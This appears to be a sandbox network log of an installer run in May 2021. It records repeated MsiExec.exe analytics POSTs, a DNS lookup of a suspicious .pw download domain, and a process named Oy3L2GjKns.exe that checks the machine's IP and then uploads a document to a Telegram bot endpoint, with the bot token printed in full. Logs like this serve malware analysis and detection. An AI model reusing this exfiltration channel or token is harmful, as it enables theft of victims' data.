Cookie: AWSALB=zD5d3sI8kmBvQjsCQeTekSPf6rf+B6f4L3AwSDDvpElJC979WaUby2TNjE51uIp3JnaZRD6fNE0sBWVgBvAnEqkyD0ZDR+M7LI3/KFGUH+/ktgXeyaA9HmMOI7dE; AWSALBCORS=zD5d3sI8kmBvQjsCQeTekSPf6rf+B6f4L3AwSDDvpElJC979WaUby2TNjE51uIp3JnaZRD6fNE0sBWVgBvAnEqkyD0ZDR+M7LI3/KFGUH+/ktgXeyaA9HmMOI7dE

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:18 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=Jhs95GksUc4w0V/RYMZNLIDCmhYCCvt05RSDVpv1As5fjMvx7hSfwficncJkl/dgOAEe826VrlnwWdU5cJ+DFrP8ItkovDdIIVlRYrdQzkvjA38TzQOYxMvO9vto; Expires=Wed, 12 May 2021 17:36:18 GMT; Path=/
Set-Cookie: AWSALBCORS=Jhs95GksUc4w0V/RYMZNLIDCmhYCCvt05RSDVpv1As5fjMvx7hSfwficncJkl/dgOAEe826VrlnwWdU5cJ+DFrP8ItkovDdIIVlRYrdQzkvjA38TzQOYxMvO9vto; Expires=Wed, 12 May 2021 17:36:18 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 199
Cache-Control: no-cache
Cookie: AWSALB=Jhs95GksUc4w0V/RYMZNLIDCmhYCCvt05RSDVpv1As5fjMvx7hSfwficncJkl/dgOAEe826VrlnwWdU5cJ+DFrP8ItkovDdIIVlRYrdQzkvjA38TzQOYxMvO9vto; AWSALBCORS=Jhs95GksUc4w0V/RYMZNLIDCmhYCCvt05RSDVpv1As5fjMvx7hSfwficncJkl/dgOAEe826VrlnwWdU5cJ+DFrP8ItkovDdIIVlRYrdQzkvjA38TzQOYxMvO9vto

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:18 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=tRHvXp2+hxNz2cndw/xzfEFaIU7VdYv48jU50xi2vgTD5QNcFnmBA3xgFEQBceOxViW/dcihYCnfr8Do4JwxfAKfGBUPyjhQ5YR5XL2clUxSCVg41dG4MZhUq+h5; Expires=Wed, 12 May 2021 17:36:18 GMT; Path=/
Set-Cookie: AWSALBCORS=tRHvXp2+hxNz2cndw/xzfEFaIU7VdYv48jU50xi2vgTD5QNcFnmBA3xgFEQBceOxViW/dcihYCnfr8Do4JwxfAKfGBUPyjhQ5YR5XL2clUxSCVg41dG4MZhUq+h5; Expires=Wed, 12 May 2021 17:36:18 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 201
Cache-Control: no-cache
Cookie: AWSALB=tRHvXp2+hxNz2cndw/xzfEFaIU7VdYv48jU50xi2vgTD5QNcFnmBA3xgFEQBceOxViW/dcihYCnfr8Do4JwxfAKfGBUPyjhQ5YR5XL2clUxSCVg41dG4MZhUq+h5; AWSALBCORS=tRHvXp2+hxNz2cndw/xzfEFaIU7VdYv48jU50xi2vgTD5QNcFnmBA3xgFEQBceOxViW/dcihYCnfr8Do4JwxfAKfGBUPyjhQ5YR5XL2clUxSCVg41dG4MZhUq+h5

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:18 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=J4RiXS3vuKxl/tiSNENjHTeSmrw6bNRWcwWLrfE+BDVc2/srY60JN1Oaxhe+Oq10Dgte9MMIIx56vuDdWmS17FxDRFyfGF69SgC9Xi9ktZGBFtuUPKKeHv7goAf0; Expires=Wed, 12 May 2021 17:36:18 GMT; Path=/
Set-Cookie: AWSALBCORS=J4RiXS3vuKxl/tiSNENjHTeSmrw6bNRWcwWLrfE+BDVc2/srY60JN1Oaxhe+Oq10Dgte9MMIIx56vuDdWmS17FxDRFyfGF69SgC9Xi9ktZGBFtuUPKKeHv7goAf0; Expires=Wed, 12 May 2021 17:36:18 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 201
Cache-Control: no-cache
Cookie: AWSALB=J4RiXS3vuKxl/tiSNENjHTeSmrw6bNRWcwWLrfE+BDVc2/srY60JN1Oaxhe+Oq10Dgte9MMIIx56vuDdWmS17FxDRFyfGF69SgC9Xi9ktZGBFtuUPKKeHv7goAf0; AWSALBCORS=J4RiXS3vuKxl/tiSNENjHTeSmrw6bNRWcwWLrfE+BDVc2/srY60JN1Oaxhe+Oq10Dgte9MMIIx56vuDdWmS17FxDRFyfGF69SgC9Xi9ktZGBFtuUPKKeHv7goAf0

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:19 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=Hp3ksnEOeOrhm6BDVJ83qbjTcwPSOLw8Ez4CLrvlcVqEcmKTLEa2pr91BLpyGh0UPk9/uADsugR7/U7Cexkznh22Suq6IPrUymmQ9aG9XEc8J7+I4mnDjbPoe2y+; Expires=Wed, 12 May 2021 17:36:19 GMT; Path=/
Set-Cookie: AWSALBCORS=Hp3ksnEOeOrhm6BDVJ83qbjTcwPSOLw8Ez4CLrvlcVqEcmKTLEa2pr91BLpyGh0UPk9/uADsugR7/U7Cexkznh22Suq6IPrUymmQ9aG9XEc8J7+I4mnDjbPoe2y+; Expires=Wed, 12 May 2021 17:36:19 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 203
Cache-Control: no-cache
Cookie: AWSALB=Hp3ksnEOeOrhm6BDVJ83qbjTcwPSOLw8Ez4CLrvlcVqEcmKTLEa2pr91BLpyGh0UPk9/uADsugR7/U7Cexkznh22Suq6IPrUymmQ9aG9XEc8J7+I4mnDjbPoe2y+; AWSALBCORS=Hp3ksnEOeOrhm6BDVJ83qbjTcwPSOLw8Ez4CLrvlcVqEcmKTLEa2pr91BLpyGh0UPk9/uADsugR7/U7Cexkznh22Suq6IPrUymmQ9aG9XEc8J7+I4mnDjbPoe2y+

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:19 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=CddgraYX+gPHF0KDVWPtJXoN0lCJe8T4WD+tQCaAVqUmfkd+dcR4bhCmx2v6+TPYTUjZcscLceSRHPvIIAuMQ3+FLxVYbc8nTTt34o5sYy9BcZsXoIcT7fJS/fzg; Expires=Wed, 12 May 2021 17:36:19 GMT; Path=/
Set-Cookie: AWSALBCORS=CddgraYX+gPHF0KDVWPtJXoN0lCJe8T4WD+tQCaAVqUmfkd+dcR4bhCmx2v6+TPYTUjZcscLceSRHPvIIAuMQ3+FLxVYbc8nTTt34o5sYy9BcZsXoIcT7fJS/fzg; Expires=Wed, 12 May 2021 17:36:19 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 202
Cache-Control: no-cache
Cookie: AWSALB=CddgraYX+gPHF0KDVWPtJXoN0lCJe8T4WD+tQCaAVqUmfkd+dcR4bhCmx2v6+TPYTUjZcscLceSRHPvIIAuMQ3+FLxVYbc8nTTt34o5sYy9BcZsXoIcT7fJS/fzg; AWSALBCORS=CddgraYX+gPHF0KDVWPtJXoN0lCJe8T4WD+tQCaAVqUmfkd+dcR4bhCmx2v6+TPYTUjZcscLceSRHPvIIAuMQ3+FLxVYbc8nTTt34o5sYy9BcZsXoIcT7fJS/fzg

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:20 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=itRf7KnHJNN0VEhHm6nx+Tte/jIHB6lBGcvrWPwlQoPgdqzsdX5t/h13BhM3/1ita8dlZ5IH8Pms+t4SU4un+PceQOK2yIRn78KwPYwm/c4kUx+KC0ozjRX40X0j; Expires=Wed, 12 May 2021 17:36:19 GMT; Path=/
Set-Cookie: AWSALBCORS=itRf7KnHJNN0VEhHm6nx+Tte/jIHB6lBGcvrWPwlQoPgdqzsdX5t/h13BhM3/1ita8dlZ5IH8Pms+t4SU4un+PceQOK2yIRn78KwPYwm/c4kUx+KC0ozjRX40X0j; Expires=Wed, 12 May 2021 17:36:19 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 204
Cache-Control: no-cache
Cookie: AWSALB=itRf7KnHJNN0VEhHm6nx+Tte/jIHB6lBGcvrWPwlQoPgdqzsdX5t/h13BhM3/1ita8dlZ5IH8Pms+t4SU4un+PceQOK2yIRn78KwPYwm/c4kUx+KC0ozjRX40X0j; AWSALBCORS=itRf7KnHJNN0VEhHm6nx+Tte/jIHB6lBGcvrWPwlQoPgdqzsdX5t/h13BhM3/1ita8dlZ5IH8Pms+t4SU4un+PceQOK2yIRn78KwPYwm/c4kUx+KC0ozjRX40X0j

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:20 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=YQ477BBRCVcSsMEYJzK9CNVyScfVdLQ1N4PSB0gE9v3KPpyF32oGDvXqhCBcnh4cRjYNR0Rg6nm31z91lrST0RjYmeNutSE6xgWTajPqtrtEcAo6SzDrf6b07shZ; Expires=Wed, 12 May 2021 17:36:20 GMT; Path=/
Set-Cookie: AWSALBCORS=YQ477BBRCVcSsMEYJzK9CNVyScfVdLQ1N4PSB0gE9v3KPpyF32oGDvXqhCBcnh4cRjYNR0Rg6nm31z91lrST0RjYmeNutSE6xgWTajPqtrtEcAo6SzDrf6b07shZ; Expires=Wed, 12 May 2021 17:36:20 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 204
Cache-Control: no-cache
Cookie: AWSALB=YQ477BBRCVcSsMEYJzK9CNVyScfVdLQ1N4PSB0gE9v3KPpyF32oGDvXqhCBcnh4cRjYNR0Rg6nm31z91lrST0RjYmeNutSE6xgWTajPqtrtEcAo6SzDrf6b07shZ; AWSALBCORS=YQ477BBRCVcSsMEYJzK9CNVyScfVdLQ1N4PSB0gE9v3KPpyF32oGDvXqhCBcnh4cRjYNR0Rg6nm31z91lrST0RjYmeNutSE6xgWTajPqtrtEcAo6SzDrf6b07shZ

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:20 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=DofMzKC8WEVdzVxwNS/tQloYUg5IqmONhA4RcI6Fs4VYxAJopqJgQXkmOIKlng/v0EW8xlhkAMWR2OmecU6c3mH7EY/Zq136gFDiV18DqLfnJ5UDKXiCvG2vvVpp; Expires=Wed, 12 May 2021 17:36:20 GMT; Path=/
Set-Cookie: AWSALBCORS=DofMzKC8WEVdzVxwNS/tQloYUg5IqmONhA4RcI6Fs4VYxAJopqJgQXkmOIKlng/v0EW8xlhkAMWR2OmecU6c3mH7EY/Zq136gFDiV18DqLfnJ5UDKXiCvG2vvVpp; Expires=Wed, 12 May 2021 17:36:20 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 207
Cache-Control: no-cache
Cookie: AWSALB=DofMzKC8WEVdzVxwNS/tQloYUg5IqmONhA4RcI6Fs4VYxAJopqJgQXkmOIKlng/v0EW8xlhkAMWR2OmecU6c3mH7EY/Zq136gFDiV18DqLfnJ5UDKXiCvG2vvVpp; AWSALBCORS=DofMzKC8WEVdzVxwNS/tQloYUg5IqmONhA4RcI6Fs4VYxAJopqJgQXkmOIKlng/v0EW8xlhkAMWR2OmecU6c3mH7EY/Zq136gFDiV18DqLfnJ5UDKXiCvG2vvVpp

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:21 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=5Ug2PO0eGumahzcgsIO+zKpZcMl4cP87iNwhFmx9a2F8jvcVO46GJpdNLAgmgX4ba4RLCUY7p53VF9cM/vGDRhideOBh0ReJECVXD9T/TyziTFOHm4bAq4nvakAa; Expires=Wed, 12 May 2021 17:36:21 GMT; Path=/
Set-Cookie: AWSALBCORS=5Ug2PO0eGumahzcgsIO+zKpZcMl4cP87iNwhFmx9a2F8jvcVO46GJpdNLAgmgX4ba4RLCUY7p53VF9cM/vGDRhideOBh0ReJECVXD9T/TyziTFOHm4bAq4nvakAa; Expires=Wed, 12 May 2021 17:36:21 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 206
Cache-Control: no-cache
Cookie: AWSALB=5Ug2PO0eGumahzcgsIO+zKpZcMl4cP87iNwhFmx9a2F8jvcVO46GJpdNLAgmgX4ba4RLCUY7p53VF9cM/vGDRhideOBh0ReJECVXD9T/TyziTFOHm4bAq4nvakAa; AWSALBCORS=5Ug2PO0eGumahzcgsIO+zKpZcMl4cP87iNwhFmx9a2F8jvcVO46GJpdNLAgmgX4ba4RLCUY7p53VF9cM/vGDRhideOBh0ReJECVXD9T/TyziTFOHm4bAq4nvakAa

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:21 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=1OyKqXQwzJRbTOUWxvUswnvs5J/QEi+y/8pglDFDhdc4ehzg614bK1tLmMYVtxgv60xG4tZqvE0YKWz4NbZOgY8b/2N2q+Bkiaf0HlzZfZ/Ti+kDiktnQSo5/Ijy; Expires=Wed, 12 May 2021 17:36:21 GMT; Path=/
Set-Cookie: AWSALBCORS=1OyKqXQwzJRbTOUWxvUswnvs5J/QEi+y/8pglDFDhdc4ehzg614bK1tLmMYVtxgv60xG4tZqvE0YKWz4NbZOgY8b/2N2q+Bkiaf0HlzZfZ/Ti+kDiktnQSo5/Ijy; Expires=Wed, 12 May 2021 17:36:21 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 201
Cache-Control: no-cache
Cookie: AWSALB=1OyKqXQwzJRbTOUWxvUswnvs5J/QEi+y/8pglDFDhdc4ehzg614bK1tLmMYVtxgv60xG4tZqvE0YKWz4NbZOgY8b/2N2q+Bkiaf0HlzZfZ/Ti+kDiktnQSo5/Ijy; AWSALBCORS=1OyKqXQwzJRbTOUWxvUswnvs5J/QEi+y/8pglDFDhdc4ehzg614bK1tLmMYVtxgv60xG4tZqvE0YKWz4NbZOgY8b/2N2q+Bkiaf0HlzZfZ/Ti+kDiktnQSo5/Ijy

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:21 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=jOEy1c3tynJO3LaDE154VqBzIrLIF/BIlIB3EzsOeFN16SykamP6jpuyP2KHDDVxOyR+/O8EuPWxBsZISKaei3JEXxkOn2jgGD1tbC0doWX+fUWtEkPRY7F6XSU7; Expires=Wed, 12 May 2021 17:36:21 GMT; Path=/
Set-Cookie: AWSALBCORS=jOEy1c3tynJO3LaDE154VqBzIrLIF/BIlIB3EzsOeFN16SykamP6jpuyP2KHDDVxOyR+/O8EuPWxBsZISKaei3JEXxkOn2jgGD1tbC0doWX+fUWtEkPRY7F6XSU7; Expires=Wed, 12 May 2021 17:36:21 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 208
Cache-Control: no-cache
Cookie: AWSALB=jOEy1c3tynJO3LaDE154VqBzIrLIF/BIlIB3EzsOeFN16SykamP6jpuyP2KHDDVxOyR+/O8EuPWxBsZISKaei3JEXxkOn2jgGD1tbC0doWX+fUWtEkPRY7F6XSU7; AWSALBCORS=jOEy1c3tynJO3LaDE154VqBzIrLIF/BIlIB3EzsOeFN16SykamP6jpuyP2KHDDVxOyR+/O8EuPWxBsZISKaei3JEXxkOn2jgGD1tbC0doWX+fUWtEkPRY7F6XSU7

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:22 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=2kak6GjVZ9xJ54d1rpVFDkE5Pw/vZmaly8kbyfgPcvP/Qzrn7auR5iuTgSp7qrk3ezkQ46iKNCOW6Sfe10zbNrb4WsEo4np8FhUjVZxEpiMS6HeGG6i2sIZ+dFzG; Expires=Wed, 12 May 2021 17:36:22 GMT; Path=/
Set-Cookie: AWSALBCORS=2kak6GjVZ9xJ54d1rpVFDkE5Pw/vZmaly8kbyfgPcvP/Qzrn7auR5iuTgSp7qrk3ezkQ46iKNCOW6Sfe10zbNrb4WsEo4np8FhUjVZxEpiMS6HeGG6i2sIZ+dFzG; Expires=Wed, 12 May 2021 17:36:22 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 212
Cache-Control: no-cache
Cookie: AWSALB=2kak6GjVZ9xJ54d1rpVFDkE5Pw/vZmaly8kbyfgPcvP/Qzrn7auR5iuTgSp7qrk3ezkQ46iKNCOW6Sfe10zbNrb4WsEo4np8FhUjVZxEpiMS6HeGG6i2sIZ+dFzG; AWSALBCORS=2kak6GjVZ9xJ54d1rpVFDkE5Pw/vZmaly8kbyfgPcvP/Qzrn7auR5iuTgSp7qrk3ezkQ46iKNCOW6Sfe10zbNrb4WsEo4np8FhUjVZxEpiMS6HeGG6i2sIZ+dFzG

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:22 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=W1CELYRjwL9YGnIGWQeDUqeoFxjklcx0aC9yKMQ12XCioyMraB65dP4EfstL00Pyf/k4PKRe5rjZ8D7/AYl9sn52KPBgA6ecMX5auW99Fx/zG5sr7d3Asx7/wq33; Expires=Wed, 12 May 2021 17:36:22 GMT; Path=/
Set-Cookie: AWSALBCORS=W1CELYRjwL9YGnIGWQeDUqeoFxjklcx0aC9yKMQ12XCioyMraB65dP4EfstL00Pyf/k4PKRe5rjZ8D7/AYl9sn52KPBgA6ecMX5auW99Fx/zG5sr7d3Asx7/wq33; Expires=Wed, 12 May 2021 17:36:22 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 190
Cache-Control: no-cache
Cookie: AWSALB=W1CELYRjwL9YGnIGWQeDUqeoFxjklcx0aC9yKMQ12XCioyMraB65dP4EfstL00Pyf/k4PKRe5rjZ8D7/AYl9sn52KPBgA6ecMX5auW99Fx/zG5sr7d3Asx7/wq33; AWSALBCORS=W1CELYRjwL9YGnIGWQeDUqeoFxjklcx0aC9yKMQ12XCioyMraB65dP4EfstL00Pyf/k4PKRe5rjZ8D7/AYl9sn52KPBgA6ecMX5auW99Fx/zG5sr7d3Asx7/wq33

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:22 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=9ILZFS+vWPPYsszR5dBsl0YBv7zkMifHBTR/M81L0sMhNqYtwdxFaEK/eUlWt5SHI+nJQwR6qnztopcBwiaey5Ou8GRKXBvzPgacxJO57JyUWP9nOVoMbOA4kYvl; Expires=Wed, 12 May 2021 17:36:22 GMT; Path=/
Set-Cookie: AWSALBCORS=9ILZFS+vWPPYsszR5dBsl0YBv7zkMifHBTR/M81L0sMhNqYtwdxFaEK/eUlWt5SHI+nJQwR6qnztopcBwiaey5Ou8GRKXBvzPgacxJO57JyUWP9nOVoMbOA4kYvl; Expires=Wed, 12 May 2021 17:36:22 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
DNS

api.myip.com

Oy3L2GjKns.exe

Remote address:

8.8.8.8:53

Request

api.myip.com

IN A

Response

api.myip.com

IN A

104.21.23.5

api.myip.com

IN A

172.67.208.45
GET

https://api.myip.com/

Oy3L2GjKns.exe

Remote address:

104.21.23.5:443

Request

GET / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
Host: api.myip.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1a98c787672cbec4b82fe49482a85d521620236182; expires=Fri, 04-Jun-21 17:36:22 GMT; path=/; domain=.myip.com; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 09df333d5900004c56f78f7000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Set-Cookie: __cf_bm=aa61d228843c7e2a03394755a5a58eeec55bfd3c-1620236182-1800-AdZuVp0n5GukMP9w65z1OSA3y6zUnoCJ/KDfgeg65t/g+AWWBWko2hSDsGpwWFjXULleSgLK8Pup0JfAlyQic4Q=; path=/; expires=Wed, 05-May-21 18:06:22 GMT; domain=.myip.com; HttpOnly; Secure; SameSite=None
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ANszQih%2Bkh2K8t8FN6GW%2FeXv9UByne1L%2BcJedbyMDY9uxzg2TQUNExS8YOOCb2MNQ%2BdU7wS8HwCSfh51xMUd9JZMxjUizPnark3jBJI%3D"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 64abbb0efff94c56-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 183
Cache-Control: no-cache
Cookie: AWSALB=9ILZFS+vWPPYsszR5dBsl0YBv7zkMifHBTR/M81L0sMhNqYtwdxFaEK/eUlWt5SHI+nJQwR6qnztopcBwiaey5Ou8GRKXBvzPgacxJO57JyUWP9nOVoMbOA4kYvl; AWSALBCORS=9ILZFS+vWPPYsszR5dBsl0YBv7zkMifHBTR/M81L0sMhNqYtwdxFaEK/eUlWt5SHI+nJQwR6qnztopcBwiaey5Ou8GRKXBvzPgacxJO57JyUWP9nOVoMbOA4kYvl

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:23 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=AsKCmsAh9QUyofyaq3nWI2tyPJ7vLa1nlYn1edmy71RM1qYYnenkRdNVxpjRe+ohkwLYyMBfgqmJjCMi25fMAgD/dnkbA+cfrFKBRIA9CdO9mhSetFz0LUiXi4NB; Expires=Wed, 12 May 2021 17:36:23 GMT; Path=/
Set-Cookie: AWSALBCORS=AsKCmsAh9QUyofyaq3nWI2tyPJ7vLa1nlYn1edmy71RM1qYYnenkRdNVxpjRe+ohkwLYyMBfgqmJjCMi25fMAgD/dnkbA+cfrFKBRIA9CdO9mhSetFz0LUiXi4NB; Expires=Wed, 12 May 2021 17:36:23 GMT; Path=/; SameSite=None; Secure
X-Powered-By: Express
DNS

api.telegram.org

Oy3L2GjKns.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
POST

https://api.telegram.org/bot1647500802:AAHGAM7Hkw3f26Oyfg1u7D-AFOvmI67r9Ok/sendDocument

Oy3L2GjKns.exe

Remote address:

149.154.167.220:443

Request

POST /bot1647500802:AAHGAM7Hkw3f26Oyfg1u7D-AFOvmI67r9Ok/sendDocument HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryovEAlxca0DiIz7tl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
Content-Length: 806
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 05 May 2021 17:36:26 GMT
Content-Type: application/json
Content-Length: 482
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://collect.installeranalytics.com/

MsiExec.exe

Remote address:

52.23.109.145:443

Request

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.15063 ; x64)
Host: collect.installeranalytics.com
Content-Length: 176
Cache-Control: no-cache
Cookie: AWSALB=AsKCmsAh9QUyofyaq3nWI2tyPJ7vLa1nlYn1edmy71RM1qYYnenkRdNVxpjRe+ohkwLYyMBfgqmJjCMi25fMAgD/dnkbA+cfrFKBRIA9CdO9mhSetFz0LUiXi4NB; AWSALBCORS=AsKCmsAh9QUyofyaq3nWI2tyPJ7vLa1nlYn1edmy71RM1qYYnenkRdNVxpjRe+ohkwLYyMBfgqmJjCMi25fMAgD/dnkbA+cfrFKBRIA9CdO9mhSetFz0LUiXi4NB

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:36:23 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: AWSALB=qMMToncJDuSxJawnLhVHCvhL7fo8jQjZwQSOT69+tEt1uGzWb8wGLtmQnKuF3sEhaN1ZUEZIuXPmWjoLLuWEaqYig5PkHgmV0yuVxFBETZ2c28Z17NsQbGm+E94/; Expires=Wed, 12 May 2021 17:36:23 GMT; Path=/
